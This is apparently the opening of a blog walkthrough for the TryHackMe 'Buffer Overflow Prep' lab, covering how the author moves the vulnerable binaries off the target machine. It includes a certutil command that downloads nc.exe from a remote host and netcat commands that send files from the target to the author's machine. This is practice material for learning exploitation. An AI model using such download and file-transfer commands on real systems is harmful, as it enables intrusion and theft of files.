TryHackMe: Buffer Overflow Prep

H0j3n
The Startup
Published in
14 min readAug 14, 2020

--

Practice stack-based buffer overflows!

I did not use the RDP inside TryHackMe, instead, I download all the files needed on the machine and put in my own Windows.

How To Transfer The Files?

First, upload our nc.exe on that machine because I can't find nc on the machine,

certutil -urlcache -f http://<IP>/nc.exe c:\Users\admin\Desktop\nc.exe

Then I just use NC to transfer files. I don't know how to transfer all directory so instead, I just transfer each one inside the vulnerable-apps directory.

#On Our Machine
nc -l -p 1234 > oscp.exe
#On Target Machine
nc.exe -w 3 <IP> 1234 < vulnerable-apps\oscp\oscp.exe

Keep doing that and let’s do all of the OVERFLOW tasks :) I’m excited to learn BOF >.<

OVERFLOW #1

Okay, right now we should run our Immunity Debugger as Administrator and open the oscp.exe.

Immunity Debugger — open oscp.exe

Click the red play button or we can go to Debug > Run. To check we can NC to target machine with port 1337.

nc <IP> 1337

--

--

H0j3n
The Startup

CTF Player 🚩 || TRYHACKME || HACKTHEBOX || VULNHUB || STUDENT